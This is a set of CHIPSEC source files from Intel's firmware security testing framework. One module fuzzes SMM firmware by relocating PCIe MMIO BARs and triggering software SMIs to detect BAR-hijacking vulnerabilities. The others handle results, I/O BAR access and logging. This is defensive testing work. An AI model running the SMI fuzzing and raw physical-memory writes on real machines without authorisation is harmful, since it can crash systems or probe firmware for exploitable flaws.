# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2017-2021, Intel Security
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# Authors:
#   Yuriy Bulygin
#   Alex Bazhaniuk
#


"""
Experimental module that may help checking SMM firmware for MMIO BAR hijacking
vulnerabilities described in the following presentation:

`BARing the System: New vulnerabilities in Coreboot & UEFI based systems <https://web.archive.org/web/20170702042016/http://www.intelsecurity.com/advanced-threat-research/content/data/REConBrussels2017_BARing_the_system.pdf>`_ by Intel Advanced Threat Research team at RECon Brussels 2017

Usage:
    ``chipsec_main -m tools.smm.rogue_mmio_bar [-a <smi_start:smi_end>,<b:d.f>]``

    - ``smi_start:smi_end``: range of SMI codes (written to IO port 0xB2)
    - ``b:d.f``: PCIe bus/device/function in b:d.f format (in hex)

Example:
    >>> chipsec_main.py -m tools.smm.rogue_mmio_bar -a 0x00:0x80
    >>> chipsec_main.py -m tools.smm.rogue_mmio_bar -a 0x00:0xFF,0:1C.0

.. NOTE::
    Look for 'changes found' messages for items that should be further investigated.

.. WARNING::
    When running this test, system may freeze, reboot, etc. This is not unexpected behavior and not generally considered a failure.

"""

from chipsec.module_common import BaseModule, SMM
from chipsec.library.returncode import ModuleResult
from chipsec.library.defines import BOUNDARY_4GB
from chipsec.library.file import write_file
from chipsec.hal.pci import PCI_HDR_BAR_STEP, PCI_HDR_BAR_BASE_MASK_MMIO64, PCI_HDR_BAR_CFGBITS_MASK
from chipsec.hal.interrupts import Interrupts

TAGS = [SMM]
METADATA_TAGS = ['OPENSOURCE', 'IA', 'TOOLS', 'SMM', 'ROGUE_MMIO_BAR']


#################################################################
# Testing configuration
#################################################################

FLUSH_OUTPUT_AFTER_SMI = False

_FILL_VALUE_QWORD = 0x0000000000000000
_MEM_FILL_VALUE = b"\xFF"
MAX_MMIO_RANGE_SIZE = 0x10000  # 0x400000

SMI_CODE_LIMIT = 0x0
SMI_DATA_LIMIT = 0xF
SMI_FUNC_LIMIT = 0xF


def DIFF(s, t, sz):
    return [pos for pos in range(sz) if s[pos] != t[pos]]


class rogue_mmio_bar(BaseModule):

    def __init__(self):
        BaseModule.__init__(self)
        self._interrupts = Interrupts(self.cs)

        # SMI code to be written to I/O port 0xB2
        self.smic_start = 0x00
        self.smic_end = SMI_CODE_LIMIT
        # SMI data to be written to I/O port 0xB3
        self.smid_start = 0x00
        self.smid_end = SMI_DATA_LIMIT
        # SMI handler "function" often supplied in ECX register
        self.smif_start = 0x00
        self.smif_end = SMI_FUNC_LIMIT
        # SMM communication buffer often supplied in EBX register
        self.comm = 0x00

        self.reloc_mmio = None

    def smi_mmio_range_fuzz(self, thread_id, b, d, f, bar_off, is64bit, bar, new_bar, base, size):

        # copy all registers from MMIO range to new location in memory
        # we do that once rather than before every SMI since we return after first change detected
        self.logger.log(f'[*] copying BAR 0x{base:X} > 0x{self.reloc_mmio:X}')
        try:
            orig_mmio = self.copy_bar(base, self.reloc_mmio, size)
        except Exception as e:
            self.logger.log_failed('Unable to copy bar. Skipping.')
            self.logger.log_verbose(str(e))
            if self.cs.os_helper.is_windows():
                self.logger.log_important('Try running in Linux for better coverage.')
            return False

        if self.logger.VERBOSE:
            self.cs.mmio.dump_MMIO(base, size)
            write_file('mmio_mem.orig', orig_mmio)

        for smi_code in range(self.smic_start, self.smic_end + 1):
            for smi_data in range(self.smid_start, self.smid_end + 1):
                for ecx in range(self.smif_start, self.smif_end + 1):
                    self.logger.log(f'> SMI# {smi_code:02X}: data {smi_data:02X}, func (ECX) {ecx:X}')
                    if FLUSH_OUTPUT_AFTER_SMI:
                        self.logger.flush()

                    # point MMIO range to new location (relocate MMIO range)
                    self.logger.log(f'  relocating BAR 0x{bar:X}')
                    if not self.modify_bar(b, d, f, bar_off, is64bit, bar, new_bar):
                        continue

                    # generate SW SMI
                    self._interrupts.send_SW_SMI(thread_id, smi_code, smi_data, _FILL_VALUE_QWORD, self.comm, ecx, _FILL_VALUE_QWORD, _FILL_VALUE_QWORD, _FILL_VALUE_QWORD)

                    # restore original location of MMIO range
                    self.restore_bar(b, d, f, bar_off, is64bit, bar)
                    self.logger.log(f'  restored BAR with 0x{bar:X}')

                    # check the contents at the address range used to relocate MMIO BAR
                    buf = self.cs.mem.read_physical_mem(self.reloc_mmio, size)
                    diff = DIFF(orig_mmio, buf, size)
                    self.logger.log("  checking relocated MMIO")
                    if len(diff) > 0:
                        self.logger.log_important(f'changes found at 0x{self.reloc_mmio:X} +{diff}')
                        if self.logger.VERBOSE:
                            write_file('mmio_mem.new', buf)
                        return True
        return False

    def copy_bar(self, bar_base, bar_base_mem, size):
        for off in range(0, size, 4):
            r = self.cs.mem.read_physical_mem_dword(bar_base + off)
            self.cs.mem.write_physical_mem_dword(bar_base_mem + off, r)
        return self.cs.mem.read_physical_mem(bar_base_mem, size)

    def modify_bar(self, b, d, f, off, is64bit, bar, new_bar):
        # Modify MMIO BAR address
        if is64bit:
            self.cs.pci.write_dword(b, d, f, off + PCI_HDR_BAR_STEP, ((new_bar >> 32) & 0xFFFFFFFF))
        self.cs.pci.write_dword(b, d, f, off, (new_bar & 0xFFFFFFFF))
        # Check that the MMIO BAR has been modified correctly. Restore original and skip if not
        l = self.cs.pci.read_dword(b, d, f, off)
        if l != (new_bar & 0xFFFFFFFF):
            self.restore_bar(b, d, f, off, is64bit, bar)
            self.logger.log(f'  skipping ({l:X} != {new_bar:X})')
            return False
        self.logger.log(f'  new BAR: 0x{l:X}')
        return True

    def restore_bar(self, b, d, f, off, is64bit, bar):
        if is64bit:
            self.cs.pci.write_dword(b, d, f, off + PCI_HDR_BAR_STEP, ((bar >> 32) & 0xFFFFFFFF))
        self.cs.pci.write_dword(b, d, f, off, (bar & 0xFFFFFFFF))
        return True

    def run(self, module_argv):
        self.logger.start_test("Experimental tool to help checking for SMM MMIO BAR issues")

        pcie_devices = []

        if len(module_argv) > 0:
            smic_arr = module_argv[0].split(':')
            self.smic_start = int(smic_arr[0], 16)
            self.smic_end = int(smic_arr[1], 16)

        if len(module_argv) > 1:
            try:
                b, df = module_argv[1].split(':')
                d, f = df.split('.')
                pcie_devices = [(int(b, 16), int(d, 16), int(f, 16), 0, 0)]
            except:
                self.logger.log_error("Incorrect b:d.f format\nUsage:\nchipsec_main -m tools.smm.rogue_mmio_bar [-a <smi_start:smi_end>,<b:d.f>]")
        else:
            self.logger.log("[*] Discovering PCIe devices..")
            pcie_devices = self.cs.pci.enumerate_devices()

        self.logger.log("[*] Testing MMIO of PCIe devices:")
        for (b, d, f, _, _, _) in pcie_devices:
            self.logger.log(f'    {b:02X}:{d:02X}.{f:X}')

        # allocate a page or SMM communication buffer (often supplied in EBX register)
        _, self.comm = self.cs.mem.alloc_physical_mem(0x1000, BOUNDARY_4GB - 1)
        # self.cs.mem.write_physical_mem( self.comm, 0x1000, chr(0)*0x1000 )

        # allocate range in physical memory (should cover all MMIO ranges including GTTMMADR)
        bsz = 2 * MAX_MMIO_RANGE_SIZE
        (va, pa) = self.cs.mem.alloc_physical_mem(bsz, BOUNDARY_4GB - 1)
        self.logger.log(f'[*] Allocated memory range : 0x{pa:016X} (0x{bsz:X} bytes)')
        self.cs.mem.write_physical_mem(pa, bsz, _MEM_FILL_VALUE * bsz)
        # align at the MAX_MMIO_RANGE_SIZE boundary within allocated range
        self.reloc_mmio = pa & (~(MAX_MMIO_RANGE_SIZE - 1))
        if self.reloc_mmio < pa:
            self.reloc_mmio += MAX_MMIO_RANGE_SIZE
        self.logger.log(f'[*] MMIO relocation address: 0x{self.reloc_mmio:016X}\n')

        for (b, d, f, vid, did, _) in pcie_devices:
            self.logger.log(f'[*] Enumerating device {b:02X}:{d:02X}.{f:X} MMIO BARs..')
            device_bars = self.cs.pci.get_device_bars(b, d, f, True)
            for (base, isMMIO, is64bit, bar_off, bar, size) in device_bars:
                if isMMIO and size <= MAX_MMIO_RANGE_SIZE:
                    self.logger.flush()
                    self.logger.log(f'[*] Found MMIO BAR +0x{bar_off:02X} (base 0x{base:016X}, size 0x{size:X})')
                    new_bar = ((self.reloc_mmio & PCI_HDR_BAR_BASE_MASK_MMIO64) | (bar & PCI_HDR_BAR_CFGBITS_MASK))
                    if self.smi_mmio_range_fuzz(0, b, d, f, bar_off, is64bit, bar, new_bar, base, size):
                        self.result.setStatusBit(self.result.status.RESTORE)
                        return self.result.getReturnCode(ModuleResult.FAILED)

        self.result.setStatusBit(self.result.status.SUCCESS)
        return self.result.getReturnCode(ModuleResult.PASSED)



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2018-2022, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#

import json
import time
import os
from collections import OrderedDict
import xml.etree.ElementTree as ET
import xml.dom.minidom
from chipsec.library.logger import logger
from typing import Dict, List, Optional


class ExitCode:
    OK = 0
    WARNING = 2
    DEPRECATED = 4
    FAIL = 8
    ERROR = 16
    EXCEPTION = 32
    INFORMATION = 64
    NOTAPPLICABLE = 128
    ARCHIVED = 256

    help_epilog = """\
  Exit Code
  ---------
  CHIPSEC returns an integer exit code:
  - Exit code is 0:       all modules ran successfully and passed
  - Exit code is not 0:   each bit means the following:
      - Bit 1: WARNING         at least one module had a warning
      - Bit 2: DEPRECATED      at least one module uses deprecated API
      - Bit 3: FAIL            at least one module failed
      - Bit 4: ERROR           at least one module wasn't able to run
      - Bit 5: EXCEPTION       at least one module threw an unexpected exception
      - Bit 6: INFORMATION     at least one module contained information
      - Bit 7: NOT APPLICABLE  at least one module was not applicable for the platform

"""


class TestCase:
    def __init__(self, name: str) -> None:
        self.name = name
        self.result = ''
        self.result_code = 0
        self.output = ''
        self.argv = ''
        self.desc = ''
        self.startTime = 0
        self.endTime = 0
        self.time = None

    def get_fields(self) -> Dict[str, str]:
        try:
            result_code = f'0x{self.result_code:016X}'
        except ValueError:
            result_code = f'0x{self.result_code.value:016X}'
        return {'name': self.name, 'output': self.output, 'result': self.result, 'code': result_code}

    def start_module(self) -> None:
        """Displays a banner for the module name provided."""
        text = f'\n[*] Running module: {self.name}'
        logger().log_heading(text)
        self.startTime = time.time()
        self.desc = self.name

    def end_module(self, result: str, result_code: int, arg: str) -> None:
        self.result = result
        self.result_code = result_code
        self.argv = arg
        self.endTime = time.time()
        self.time = self.endTime - self.startTime


class ChipsecResults:
    def __init__(self):
        self.test_cases = []
        self.properties = None
        self.summary = False
        self.exceptions = []
        self.time = None

    def add_properties(self, properties: Dict[str, str]) -> None:
        self.properties = properties

    def add_testcase(self, test: TestCase) -> None:
        self.test_cases.append(test)

    def get_current_testcase(self) -> Optional[TestCase]:
        if len(self.test_cases) == 0 or self.summary:
            return None
        return self.test_cases[len(self.test_cases) - 1]

    def add_exception(self, name):
        self.exceptions.append(str(name))

    def get_return_code(self):
        pass

    def order_summary(self):
        return {}

    def print_summary(self):
        pass

    def set_time(self, pTime: Optional[float] = None) -> None:
        """Sets the time"""
        if pTime is not None:
            self.time = pTime
        else:
            curr_testcase = self.get_current_testcase()
            if curr_testcase:
                self.time = curr_testcase.endTime - self.test_cases[0].startTime
            else:
                self.time = self.test_cases[0].time

    def get_results(self) -> Dict[str, int]:
        results = {}
        for test in self.test_cases:
            results[test.name] = {'result': test.result}
        return results

    def xml_summary(self) -> str:
        summary = self.order_summary()
        xml_element = ET.Element("Summary")
        for value in summary.keys():
            temp = {}
            if value == 'total':
                temp['name'] = value
                temp['total'] = f'{summary[value]:d}'
                m_element = ET.SubElement(xml_element, 'result', temp)
            else:
                temp['name'] = value
                temp['total'] = f'{len(summary[value]):d}'
                m_element = ET.SubElement(xml_element, 'result', temp)
                for mod in summary[value]:
                    n_element = ET.SubElement(m_element, 'module')
                    n_element.text = mod
        return ET.tostring(xml_element, "unicode", None)

    def json_summary(self) -> str:
        summary = self.order_summary()
        js = json.dumps(summary, sort_keys=False, indent=2, separators=(',', ': '))
        return js

    def json_full(self) -> str:
        summary = self.get_results()
        js = json.dumps(summary, sort_keys=False, indent=2, separators=(',', ': '))
        return js

    def xml_full(self, name: str, runtime: Optional[float] = None) -> str:
        xml_element = ET.Element('testsuites')
        summary = self.order_summary()
        summary_dict = {}
        for value in summary.keys():
            if value == 'total':
                summary_dict[value] = f'{summary[value]:d}'
            else:
                summary_dict[value.replace(' ', '')] = f'{len(summary[value]):d}'
        summary_dict["name"] = os.path.basename(os.path.splitext(name)[0])
        if runtime is not None:
            summary_dict["time"] = f'{runtime:5f}'
        ts_element = ET.SubElement(xml_element, "testsuite", summary_dict)
        # add properties
        pr_element = ET.SubElement(ts_element, "properties")
        prop_dict = {}
        if self.properties is not None:
            for value in self.properties:
                prop_dict["name"] = value
                prop_dict["value"] = self.properties[value]
                ET.SubElement(pr_element, "property", prop_dict)
        # add test cases
        for test in self.test_cases:
            ttime = test.time if test.time is not None else 0.0
            tc_element = ET.SubElement(ts_element, "testcase", {'classname': test.name, 'name': test.desc, 'time': f'{ttime:5f}'})
            ET.SubElement(tc_element, "pass", {"type": test.result})
            out_element = ET.SubElement(tc_element, "system-out")
            out_element.text = test.output
        return xml.dom.minidom.parseString(ET.tostring(xml_element, None, None)).toprettyxml()

    def markdown_full(self, name: str) -> str:
        passed = []
        failed = []
        error = []
        warning = []
        information = []
        notapplicable = []
        deprecated = []
        archived = []
        destination = {'Passed': passed,
                       'Failed': failed,
                       'Error': error,
                       'Warning': warning,
                       'Information': information,
                       'NotApplicable': notapplicable,
                       'Deprecated': deprecated,
                       'Archived': archived
                       }

        for test in self.test_cases:
            # Test case as header level 4
            out_string = f'#### {test.name.replace("chipsec.modules.", ""):s}\n'
            for line in test.output.splitlines(True):
                # Format output as code
                out_string += f'    {line:s}'
            destination[test.result].append(out_string)

        ret_string = ''
        for result in destination:
            # Category as header level 1
            ret_string += f'\n# {result:s}:{len(destination[result]):d}\n'
            ret_string += ''.join(destination[result])
        return ret_string


class LegacyResults(ChipsecResults):
    def print_summary(self, runtime: Optional[float] = None) -> None:
        summary = self.order_summary()
        filler = '*' * 27
        logger().log(f'\n[CHIPSEC] {filler}  SUMMARY  {filler}')
        print_dictionary = {'failed to run': logger().log_error,
                            'passed': logger().log_passed,
                            'information': logger().log_information,
                            'archived': logger().log_information,
                            'failed': logger().log_failed,
                            'not applicable': logger().log_not_applicable}
        if runtime is not None:
            logger().log(f'[CHIPSEC] Time elapsed            {runtime:.3f}')

        for result in summary.keys():
            if result == 'total':
                logger().log(f'[CHIPSEC] Modules {result:16}{summary[result]:d}')
            elif result == 'warnings':
                logger().log(f'[CHIPSEC] Modules with {result:11}{len(summary[result]):d}:')
                for mod in summary[result]:
                    logger().log_warning(mod)
            elif result == 'exceptions':
                if len(summary[result]) > 0:
                    logger().log(f'[CHIPSEC] Modules with {result:11}{len(summary[result]):d}:')
                    for mod in summary[result]:
                        logger().log_error(mod)
            elif result == 'archived':
                continue
            else:
                logger().log(f'[CHIPSEC] Modules {result:16}{len(summary[result]):d}:')
                for mod in summary[result]:
                    print_dictionary[result](mod)
        logger().log('[CHIPSEC] *****************************************************************')

    def order_summary(self) -> Dict[str, List[TestCase]]:
        self.summary = True
        ret = OrderedDict()
        ret['failed to run'] = []
        ret['passed'] = []
        ret['information'] = []
        ret['failed'] = []
        ret['warnings'] = []
        ret['not applicable'] = []
        ret['archived'] = []
        destination = {'Passed': 'passed',
                       'Failed': 'failed',
                       'Error': 'failed to run',
                       'Warning': 'warnings',
                       'Information': 'information',
                       'NotApplicable': 'not applicable',
                       'Archived': 'archived'
                       }
        executed = 0
        for test in self.test_cases:
            executed += 1
            fields = test.get_fields()
            ret[destination[fields['result']]].append(fields['name'])
        ret['total'] = executed
        ret['exceptions'] = self.exceptions
        return ret

    def get_return_code(self) -> int:
        summary = self.order_summary()
        destination = {
                        'failed to run': ExitCode.ERROR,
                        'exceptions': ExitCode.EXCEPTION,
                        'failed': ExitCode.FAIL,
                        'warnings': ExitCode.WARNING,
                        'not applicable': ExitCode.NOTAPPLICABLE,
                        'information': ExitCode.INFORMATION,
                        'archived': ExitCode.ARCHIVED
        }
        for result in destination.keys():
            if len(summary[result]) != 0:
                return destination[result]
        return ExitCode.OK


class ReturnCodeResults(ChipsecResults):
    def print_summary(self, runtime: Optional[float] = None) -> None:
        summary = self.order_summary()
        filler = '*' * 27
        logger().log(f'\n[CHIPSEC] {filler}  SUMMARY  {filler}')
        if runtime is not None:
            logger().log(f'[CHIPSEC] Time elapsed            {runtime:.3f}')

        for result in summary.keys():
            if result == 'total':
                logger().log(f'[CHIPSEC] Modules {result:16}{summary[result]:d}')
            elif result == 'exceptions':
                if len(summary[result]) > 0:
                    logger().log(f'[CHIPSEC] Modules with {result:11}{len(summary[result]):d}:')
                    for mod in summary[result]:
                        logger().log_error(mod)
            elif result == 'archived':
                continue
            else:
                logger().log(f'[CHIPSEC] Modules {result:16}{len(summary[result]):d}:')
                for mod in summary[result]:
                    logger().log(f"    {mod}")
        logger().log('[CHIPSEC] *****************************************************************')

    def order_summary(self):
        if self.time is None:
            self.set_time()
        self.summary = True
        ret = OrderedDict()
        passed = []
        failed = []
        archived = []
        executed = 0
        for test in self.test_cases:
            executed += 1
            fields = test.get_fields()
            if fields['result'] == 'Passed':
                passed.append(fields['name'])
            elif fields['result'] == 'Failed':
                failed.append(fields['name'])
            elif fields['result'] == 'Archived':
                archived.append(fields['name'])
        ret['total'] = executed
        ret['failed'] = failed
        ret['passed'] = passed
        ret['archived'] = archived
        ret['exceptions'] = self.exceptions
        return ret

    def get_return_code(self):
        summary = self.order_summary()
        if len(self.test_cases) == 1:
            return self.test_cases[0].result_code
        elif len(summary['failed']) != 0:
            return ExitCode.FAIL
        else:
            return ExitCode.OK



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


"""
I/O BAR access (dump, read/write)

usage:
    >>> get_IO_BAR_base_address( bar_name )
    >>> read_IO_BAR_reg( bar_name, offset, size )
    >>> write_IO_BAR_reg( bar_name, offset, size, value )
    >>> dump_IO_BAR( bar_name )
"""
from typing import Tuple, List
from chipsec.hal import hal_base
from chipsec.library.logger import logger
from chipsec.library.exceptions import IOBARNotFoundError
from chipsec.library.exceptions import CSReadError

DEFAULT_IO_BAR_SIZE = 0x100


class IOBAR(hal_base.HALBase):

    def __init__(self, cs):
        super(IOBAR, self).__init__(cs)

    #
    # Check if I/O BAR with bar_name has been defined in XML config
    # Use this function to fall-back to hardcoded config in case XML config is not available
    #
    def is_IO_BAR_defined(self, bar_name: str) -> bool:
        try:
            return (self.cs.Cfg.IO_BARS[bar_name] is not None)
        except KeyError:
            if logger().HAL:
                logger().log_error(f"'{bar_name}' I/O BAR definition not found in XML config")
            return False

    #
    # Get base address of I/O range by IO BAR name
    #
    def get_IO_BAR_base_address(self, bar_name: str) -> Tuple[int, int]:
        bar = self.cs.Cfg.IO_BARS[bar_name]
        if bar is None or bar == {}:
            raise IOBARNotFoundError(f'IOBARNotFound: {bar_name}')

        if 'register' in bar:
            bar_reg = bar['register']
            if 'base_field' in bar:
                base_field = bar['base_field']
                try:
                    base = self.cs.register.read_field(bar_reg, base_field, preserve_field_position=True)
                except Exception:
                    base = 0
                try:
                    empty_base = self.cs.register.get_field_mask(bar_reg, base_field, preserve_field_position=True)
                except Exception:
                    empty_base = 0
            else:
                try:
                    base = self.cs.register.read(bar_reg)
                except Exception:
                    base = 0
                try:
                    empty_base = self.cs.register.get_field_mask(bar_reg, preserve_field_position=True)
                except Exception:
                    empty_base = 0
        else:
            # this method is not preferred
            base = self.cs.pci.read_word(self.cs.device.get_first_bus(bar), bar['dev'], bar['fun'], bar['reg'])
            empty_base = 0xFFFF

        if 'fixed_address' in bar and (base == empty_base or base == 0):
            base = bar['fixed_address']
            if logger().HAL:
                logger().log(f'[iobar] Using fixed address for {bar_name}: 0x{base:016X}')

        if 'mask' in bar:
            base = base & bar['mask']
        if 'offset' in bar:
            base = base + bar['offset']
        size = bar['size'] if ('size' in bar) else DEFAULT_IO_BAR_SIZE

        if logger().HAL:
            logger().log(f'[iobar] {bar_name}: 0x{base:04X} (size = 0x{size:X})')
        if base == 0:
            raise CSReadError(f'IOBAR ({bar_name}) base address is 0')
        return base, size

    #
    # Read I/O register from I/O range defined by I/O BAR name
    #
    def read_IO_BAR_reg(self, bar_name: str, offset: int, size: int) -> int:
        if logger().HAL:
            logger().log(f'[iobar] read {bar_name} + 0x{offset:X} ({size:d})')
        (bar_base, bar_size) = self.get_IO_BAR_base_address(bar_name)
        io_port = bar_base + offset
        if offset > bar_size and logger().HAL:
            logger().log_warning(f'offset 0x{offset:X} is outside {bar_name} size (0x{size:X})')
        value = self.cs.io._read_port(io_port, size)
        return value

    #
    # Write I/O register from I/O range defined by I/O BAR name
    #
    def write_IO_BAR_reg(self, bar_name: str, offset: int, size: int, value: int) -> int:
        (bar_base, bar_size) = self.get_IO_BAR_base_address(bar_name)
        if logger().HAL:
            logger().log(f'[iobar] write {bar_name} + 0x{offset:X} ({size:d}): 0x{value:X}')
        io_port = bar_base + offset
        if offset > bar_size and logger().HAL:
            logger().log_warning(f'offset 0x{offset:X} is outside {bar_name} size (0x{size:X})')
        return self.cs.io._write_port(io_port, value, size)

    #
    # Check if I/O range is enabled by BAR name
    #
    def is_IO_BAR_enabled(self, bar_name: str) -> bool:
        bar = self.cs.Cfg.IO_BARS[bar_name]
        is_enabled = True
        if 'register' in bar:
            bar_reg = bar['register']
            if 'enable_field' in bar:
                bar_en_field = bar['enable_field']
                is_enabled = (1 == self.cs.register.read_field(bar_reg, bar_en_field))
        return is_enabled

    def list_IO_BARs(self) -> None:
        logger().log('')
        logger().log('--------------------------------------------------------------------------------')
        logger().log(' I/O Range    | BAR Register   | Base             | Size     | En? | Description')
        logger().log('--------------------------------------------------------------------------------')
        for _bar_name in self.cs.Cfg.IO_BARS:
            if not self.is_IO_BAR_defined(_bar_name):
                continue
            _bar = self.cs.Cfg.IO_BARS[_bar_name]
            bus_data = []
            if 'register' in _bar:
                bus_data = self.cs.register.get_bus(_bar['register'])
                if not bus_data:
                    if 'bus' in self.cs.register.get_def(_bar['register']):
                        bus_data = [self.cs.register.get_def(_bar['register'])['bus']]
            elif 'bus' in _bar:
                bus_data.extend(_bar['bus'])
            else:
                continue

            for bus in bus_data:
                try:
                    (_base, _size) = self.get_IO_BAR_base_address(_bar_name)
                except CSReadError:
                    if self.logger.HAL:
                        self.logger.log(f"Unable to find IO BAR {_bar_name}")
                    continue
                _en = self.is_IO_BAR_enabled(_bar_name)

                if 'register' in _bar:
                    _s = _bar['register']
                    if 'offset' in _bar:
                        _s += (f' + 0x{_bar["offset"]:X}')
                else:
                    _s = f'{bus:02X}:{_bar["dev"]:02X}.{_bar["fun"]:01X} + {_bar["reg"]}'

                logger().log(f' {_bar_name:12} | {_s:14} | {_base:016X} | {_size:08X} | {_en:d}   | {_bar["desc"]}')

    #
    # Read I/O range by I/O BAR name
    #
    def read_IO_BAR(self, bar_name: str, size: int = 1) -> List[int]:
        (range_base, range_size) = self.get_IO_BAR_base_address(bar_name)
        n = range_size // size
        io_ports = []
        for i in range(n):
            io_ports.append(self.cs.io._read_port(range_base + i * size, size))
        return io_ports

    #
    # Dump I/O range by I/O BAR name
    #
    def dump_IO_BAR(self, bar_name: str, size: int = 1) -> None:
        (range_base, range_size) = self.get_IO_BAR_base_address(bar_name)
        n = range_size // size
        fmt = f'0{size * 2:d}X'
        logger().log(f"[iobar] I/O BAR {bar_name}:")
        for i in range(n):
            reg = self.cs.io._read_port(range_base + i * size, size)
            logger().log(f'{size * i:+04X}: {reg:{fmt}}')



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#

"""
Logging functions
"""

import csv
import logging
import platform
import string
import sys
import os
from time import localtime, strftime
from typing import Tuple, Dict, List, Optional
from enum import Enum

dir_path = os.path.dirname(os.path.realpath(__file__))
BASE_PATH = os.path.join(dir_path, os.pardir, os.pardir)
LOGGER_NAME = 'CHIPSEC_LOGGER'


class level(Enum):
    DEBUG = 10
    HELPER = 11
    HAL = 12
    VERBOSE = 13
    INFO = 20
    GOOD = 21
    BAD = 22
    IMPORTANT = 23
    WARNING = 30
    ERROR = 40
    CRITICAL = 50
    EXCEPTION = 60


class chipsecFilter(logging.Filter):
    def __init__(self, name: str = ...) -> None:
        super().__init__(name)

    def filter(self, record):
        if record.levelno == level.ERROR.value:
            record.additional = 'ERROR: '
        elif record.levelno == level.WARNING.value:
            record.additional = 'WARNING: '
        elif record.levelno == level.IMPORTANT.value:
            record.additional = '[!] '
        elif record.levelno == level.GOOD.value:
            record.additional = '[+] '
        elif record.levelno == level.BAD.value:
            record.additional = '[-] '
        elif record.levelno == level.DEBUG.value:
            record.additional = '[*] [DEBUG] '
        elif record.levelno == level.VERBOSE.value:
            record.additional = '[*] [VERBOSE] '
        elif record.levelno == level.HAL.value:
            record.additional = '[*] [HAL] '
        elif record.levelno == level.HELPER.value:
            record.additional = '[*] [HELPER] '
        else:
            record.additional = ''
        return True


class chipsecLogFormatter(logging.Formatter):
    def __init__(self, fmt: Optional[str] = ..., datefmt: Optional[str] = ..., style='%') -> None:
        super().__init__(fmt, datefmt, style)
        self.infmt = fmt

    def format(self, record):
        if record.args:
            record.args = tuple()
        formatter = logging.Formatter(self.infmt)
        return formatter.format(record)


class chipsecStreamFormatter(logging.Formatter):
    try:
        is_atty = sys.stdout.isatty()
    except AttributeError:
        is_atty = False
    # Respect https://no-color.org/ convention, and disable colorization
    # when the output is not a terminal (eg. redirection to a file)
    mPlatform = platform.system().lower()
    if is_atty and os.getenv('NO_COLOR') is None and (("windows" == mPlatform) or "linux" == mPlatform):
        if mPlatform == 'windows':
            _ = os.system('color')
        colors = {
            'GREY': '\033[90m',
            'RED': '\033[91m',
            'GREEN': '\033[92m',
            'YELLOW': '\033[93m',
            'BLUE': '\033[94m',
            'PURPLE': '\033[95m',
            'CYAN': '\033[96m',
            'WHITE': '\033[97m',
            'END': '\033[0m'}
    else:
        colors = {}

    def __init__(self, fmt: Optional[str] = ..., datefmt: Optional[str] = ..., style='%') -> None:
        super().__init__(fmt, datefmt, style)
        self.infmt = fmt
        self.levelfmt = '[%(levelname)s]  %(message)s'

    def format(self, record):
        if record.levelno == level.DEBUG.value:
            color = 'BLUE'
        elif record.levelno in [level.VERBOSE.value, level.HAL.value, level.HELPER.value]:
            color = 'GREY'
        elif record.levelno == level.GOOD.value:
            color = 'GREEN'
        elif record.levelno == level.IMPORTANT.value:
            color = 'CYAN'
        elif record.levelno == level.WARNING.value:
            color = 'YELLOW'
        elif record.levelno in [level.ERROR.value, level.BAD.value]:
            color = 'RED'
        elif record.levelno in [level.EXCEPTION.value, level.CRITICAL.value]:
            color = 'PURPLE'
        else:
            color = 'WHITE'
        if record.args:
            if record.args[0] is not None and record.args[0] in self.colors:
                color = record.args[0]
            record.args = tuple()
        if color in self.colors:
            log_fmt = f'{self.colors[color]}{self.infmt}{self.colors["END"]}'
        else:
            log_fmt = self.infmt
        formatter = logging.Formatter(log_fmt)
        return formatter.format(record)


class Logger:
    """Class for logging to console, text file, XML."""

    def __init__(self):
        """The Constructor."""
        self.mytime = localtime()
        self.logfile = None
        self.ALWAYS_FLUSH = False
        self.LOG_PATH = os.path.join(BASE_PATH, "logs")
        self.logstream = logging.StreamHandler(sys.stdout)
        self.chipsecLogger = logging.getLogger(LOGGER_NAME)
        self.chipsecLogger.setLevel(logging.INFO)
        if not self.chipsecLogger.handlers:
            self.chipsecLogger.addHandler(self.logstream)
        if not self.chipsecLogger.filters:
            self.chipsecLogger.addFilter(chipsecFilter(LOGGER_NAME))
        self.chipsecLogger.propagate = False
        logging.addLevelName(level.VERBOSE.value, level.VERBOSE.name)
        logging.addLevelName(level.HAL.value, level.HAL.name)
        logging.addLevelName(level.HELPER.value, level.HELPER.name)
        streamFormatter = chipsecStreamFormatter('%(additional)s%(message)s')
        self.logstream.setFormatter(streamFormatter)
        self.logFormatter = chipsecLogFormatter('%(additional)s%(message)s')

